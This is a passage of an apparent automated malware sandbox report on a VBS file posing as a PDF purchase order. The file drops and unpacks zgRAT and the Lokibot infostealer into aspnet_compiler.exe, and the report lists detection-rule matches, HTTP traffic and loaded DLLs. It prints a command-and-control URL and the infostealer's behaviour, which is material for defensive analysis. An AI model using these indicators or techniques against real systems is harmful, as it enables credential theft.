                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9RaApPfE6upeyNuSRf6XD%2FH5saBd60MqGlChSRqyE5QZ5N42dz2ZL84pOTOO4hX%2BHxw53fnqRZJf3vDxTKBeJTd%2FvQxVfYNk9hQwojBY%2FnqzAqshfubzxRFdhfsuXq6AA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013adfc826db6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HZE5EwbHDpGHOsELggaPbqHTnAwPc82HKJ3dwDsE0cBcPpXZBDGChTThoUJMI28Rq5R4mA65wFnl01RvjZ25JBoVjw1McHIM7RTia%2B4NuijPZXTTNAtOEard7FLQEegBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013b2a8b9a575-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InVjmQySneVwFIvcB%2BMKAzADbiRL3UqbqlRAOLUArt2Lk8vxhBbfocB5x7251NqQkPEPfxnfrYb3YJBM332ZxGXtbZqEPJcDKCdLFrCcHIJ2zdVD9yrTXmIDOQK34dAFRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013b76e134c15-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydm07zyz%2F9SecHwthypbxWJzD0NhDi%2BhqV6Y3y7guYLov0RPixGzpTOblWWuRmaMehytK14Bce45jceALt%2BMxFH086EZ2tFXgCWU0vBp2e%2BcdJ07w6tlORxWKwKlWwnfgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013bc4f1d8da6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=js%2B3kSubVzQoLrNf9jMl6m9d5%2Bl9qUpPK9HAauQK%2FCp5wi%2FnFU7Zx4DWyDaNLXBsLevZOP6cClqiIp7HSfHVfrqRKGBmYA%2Fy3raJhMSQzz63MyBYNLpVlrgYy%2Fy4%2Fq4zww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013c10ee102ed-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoQ8mn4yQZ8xuvVJPVHXrgjiI1Kc5z1yQX4TsUmShe4umxdCggYnVCjNAOUj3CfC4XZdUFyW4CdQf3HGHF8iQUGsec3pfNnoT9HUl0qO7tEqiaG%2FmOHFY5KfAP6lxOwSuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013c60f5e31da-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RepKrIlom55Ury5ShmjaPgwc58l61fbVjowvj48GpQ0JyfEJweHEqfmZHpLJNqg4hHfJBRupuGSi%2B1r719dD%2BM760fasd1M3Qa7axmSkv97RLz0JKSUP3m1qI%2BXliKFOZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013d4bb227477-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiVr%2Bmu6p3qg8iYD06JAPTm6K81vYRbCMTOf8NZ8CDWzUuYmxAChkrNBs8jn3qgiLqmVPGXg1B93YtQTZe%2BBMaplO4Ilhn555zJWpLHaU1aJJ%2BwzeR%2F4G9dKD7nIeEFbGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013d99e615c5f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fu9%2Fz0txcHfLZrS8TZNpgqQFUX%2BD%2BTaFhYWoraQEtTvcH7zfHONy1R83EEyR0Ifle%2FkhIYqo1OpefJDlReRvjGupOq3E0jJrF0k9QMKb7x%2BACvO1pea45423D9R2HgrdLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013de7c9bb3d4-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDJQoLlFI139OnCbYIj8B3JbJHEiByhI%2BhT%2B01r8gyMYFehzfbUR6BLVS5q8TPVBlKdnJsO1F8FPTd0abZcgSDUB413SJIzO7%2BzhBB2wo5XrTtTj79%2F372sJbux5NC%2F1BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013e33808741e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N9ZuxSo5ETztlAp8mlCNp4Ybpa%2Fuhc3lAHjXc7KKIuvL8%2FqmZqkf8qfQ5%2Fz84CJJetmhTOs%2FYhHZh9nHAeamVn%2BwkDAd1sV2VZNUEiASH5TqNAAyTskIhfk4VoT9dwTFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013e81cfa6dad-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rH5IKNnUHnByPE%2BNARCr3wPIOBqalodlIOchukprOydgmgF5oKtQm191Q4T3LgBd679fyk8QDe811q2WlR%2BVPMqrF%2Fro4AwXE3A1hgYra%2FrexvUSL4%2Bhpmgi25HZva14yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013ecdd9c8da3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnEq6ZldLDpSAR6XYw60JSAuccC7iwsTKhGa9cZtjOgdBlQ5zlFQ5MNU3LPqruMzwPFvJWAJxI%2FYMGbDq44LQfoyfQmv%2FVlL54QdKbQesUsCT3Opou56p6PmeDOU7mIIIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013f19d3431e6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1c8ZWHOxB06v96hAqsl%2BSmXf%2FKJMlT%2FBxGKTj4bjA2GVREmkTQzidLNHKt68i%2B4OKPFW4MWG1IkYjxz2dmP2MvTpZNnM55VAPcIzbUDVSl63GNZnARqMHR2OyDbwhi4Pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013f658ca8dc6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptkxQNQOtr9ciCgNB83eUiTr5xOm3WdMsRhTrFHpCSHS6OXhp1WjiOiB2SzVW17wDG1K4rgg2qRwn9cRYgdxNYS2%2Bi4o%2ByMMblrnc7lD5DStOcTF%2F%2FgJKGCfD22z8bC13w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013fb2e918dae-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fbFCgsAg4dSvBXbBxyxy2Qcq2C2v8J0yMPFh5jm5XfyD0NJqef9ZyFKJYA6XUeOnd4iwwuKUn6v6DtUfGfxjik2sRpqErL8ZKc23IpSIMl8lYDwVzSCaalt8N0zmVDCMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870014008a646dce-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                          Source: aspnet_compiler.exe, 00000004.00000002.3493958315.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altaskifer.sbs/PWS/fre.php

                          System Summary

                          barindex
                          Source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00700CA02_2_00700CA0
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00700C902_2_00700C90
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00700F402_2_00700F40
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_049529402_2_04952940
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_04952BE12_2_04952BE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040549C4_2_0040549C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004029D44_2_004029D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                          Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsInitial sample: Strings found which are bigger than 50
                          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscorjit.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
